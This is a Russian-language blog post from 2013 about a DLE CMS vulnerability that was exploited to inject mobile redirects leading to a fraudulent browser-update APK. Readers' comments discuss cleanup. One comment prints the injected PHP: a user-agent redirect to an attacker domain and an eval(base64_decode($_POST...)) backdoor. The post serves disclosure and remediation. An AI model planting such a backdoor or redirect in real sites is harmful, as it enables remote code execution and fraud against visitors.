Уязвимость DLE browser_update_install.apk

25.01.2013 17:41 Администратор
Печать PDF
Рейтинг пользователей: / 51
ХудшийЛучший 

 В первых числах 2013 года используя уязвимость CMS DLE  на многие сайты был внедрен вредоносный код.

Указанный код при захождении на сайт с мобильного устройства перенаправлял пользователя на сайт злоумышленника (Location: http://statuses.ws/), откуда скачивалось вредоносное программное обеспечение под видом обновления браузера.

При установке указанного ПО на телефоны iPhone, Android, BlackBerry и др. списывались деньги со счетов путем отправления платных СМС.

 

 

Файлы подвергшиеся изменению в DLE:

index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Возможно и другие:
website.lng (добавлено 14.02.13) 

 


Сам код:

browser_update_install.apk

На официальном сайте DLE указано:

Проблема: Недостаточная фильтрация данных в парсере шаблонов.
Ошибка в версии: 9.6 и все более ранние версии
Степень опасности: Высокая

Пример вредоносного apk для Android (browser_update_install.apk):

Внимание! Ни в коем случае не устанавливайте  browser_update_install.apk

browser_update_install.apk

 После удаления указанного кода с сайта на CMS DLE, необходимо обновить файл templates.class

Обновлено 14.02.2013 14:55

Комментарии   

 
0 #8 Polyuh 28.02.2013 11:11
Цитирую yes.km.ua:
Цитирую Polyuh:
афигеть, у меня на сайтах такая хрень, проверял на смартфоне...

почистить получилось? Дырки залатали? :-)

в процессе исправления, спасибо за статью... кстати я ещё умудрился инсталлировать скачаний файл browser_update_ install.apk - результат с мобилки срубало 33 грн. Теперь буду смотреть что ставлю.
Цитировать
 
 
0 #7 yes.km.ua 27.02.2013 23:14
Цитирую Polyuh:
афигеть, у меня на сайтах такая хрень, проверял на смартфоне...

почистить получилось? Дырки залатали? :-)
Цитировать
 
 
0 #6 Polyuh 27.02.2013 22:08
афигеть, у меня на сайтах такая хрень, проверял на смартфоне...
Цитировать
 
 
0 #5 yes.km.ua 14.02.2013 16:08
Цитирую gvam:
Еще такой вопрос: Как проверить сайт через мибильный браузер? Ну тоесть не с телефона а с компа? И у кого будет похожая проблема вот где была эта гадость: /public_html/language/Russian/website.lng
В самом низу!)

Например так:
1. Устанавливаете емулятор андроида: http://www.bluestacks.com
(если будет ошибка при установке: ошибка при инициализации приложений (0x0000135), то установите .NET http://www.microsoft.com/ru-ru/download/details.aspx?id=17851 )
2. Устанавливаем любой браузер. (В эмуляторе полноценный Google play)
3. Заходим на свой сайт.
Цитировать
 
 
0 #4 r0n1x 14.02.2013 14:07
if (strpos($_SERVE R['HTTP_USER_AG ENT'],"iPhone") || strpos($_SERVER ['HTTP_USER_AGE NT'],"Android") || strpos($_SERVER ['HTTP_USER_AGE NT'],"webOS") || strpos($_SERVER ['HTTP_USER_AGE NT'],"BlackBerr y") || strpos($_SERVER ['HTTP_USER_AGE NT'],"iPod")) header('Location: http://live-internet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));


оно еще вконце файла website.lng сидит
Цитировать
 
 
0 #3 gvam 14.02.2013 13:24
Еще такой вопрос: Как проверить сайт через мибильный браузер? Ну тоесть не с телефона а с компа? И у кого будет похожая проблема вот где была эта гадость: /public_html/language/Russian/website.lng
В самом низу!)
Цитировать
 
 
0 #2 yes.km.ua 11.02.2013 09:37
Цитирую gvam:
Подскажите в чем проблемма? Все файлы заменил (почистил) кеш обновил сласс тоже а оно всеравно грузит вирусы!!! newspress.com.ua фот глянте хелп плиз

где то не дочистили))
У Вас действительно идет переадресация на live-internet.w s Хорошо, что это доменное имя недоступно.
Что нужно сделать:
Заходите по ФТП с помощью Total Commander. Жмете alt+f7. Устанавливаете маску для поиска файлов *.php C текстом: либо live-internet.w s либо $Android
Открываете найденные файлы и чистите.
Цитировать
 
 
+1 #1 gvam 11.02.2013 00:28
Подскажите в чем проблемма? Все файлы заменил (почистил) кеш обновил сласс тоже а оно всеравно грузит вирусы!!! newspress.com.u a фот глянте хелп плиз
Цитировать
 

Добавить комментарий


Защитный код
Обновить

| + - | RTL - LTR